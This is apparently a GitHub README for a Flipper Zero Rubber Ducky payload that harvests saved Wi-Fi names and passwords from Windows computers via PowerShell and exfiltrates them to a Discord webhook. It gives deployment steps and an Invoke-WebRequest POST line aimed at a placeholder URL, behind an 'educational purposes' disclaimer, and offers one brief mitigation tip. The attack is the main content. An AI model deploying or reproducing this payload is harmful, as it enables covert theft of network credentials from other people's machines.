Important
The author and contributors claim no responsibility for unauthorized or unlawful utilization. This encompasses the use of the material, whether through forks or modifications undertaken by third parties. Users are strongly encouraged to exercise due diligence and assume full responsibility for their actions. The contents within this repository are provided solely for educational purposes.
Obtain Wi-Fi names and passwords from a Microsoft Windows operating system computer. This can be accessed by leveraging the convenience of Wi-Fi profiles that are saved on Microsoft Windows operating systems using PowerShell.
Note
The payload was designed for a Flipper Zero using the classic Rubber Ducky Scripting Language 1.0 to exfiltrate data through the use of Discord webhooks. It can also be used as a regular payload with a webhook.
- Replace
https://YOUR_LINK_HERE.comin payload.txt with your custom webhook.
...Invoke-WebRequest -Uri https://YOUR_LINK_HERE.com -Method Post...
- Upload payload.txt to your hotplug.
- Execute the file.
There are many ways to prevent this hotload attack from occurring. A very quick, simple, and temporary way is by deleting "Managed Known Networks" in Settings and to refrain from saving your Wi-Fi passwords.
The content and software in this GitHub repository are licensed under the Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License. Users are free to share and adapt the material covered by this license, subject to the following conditions: provide appropriate attribution, refrain from employing it for commercial purposes, and distribute any derivative works under the same licensing terms.
Note
If you would like to provide appropriate attribution, you may simply refer to this GitHub repository or this GitHub account @cxdzc.
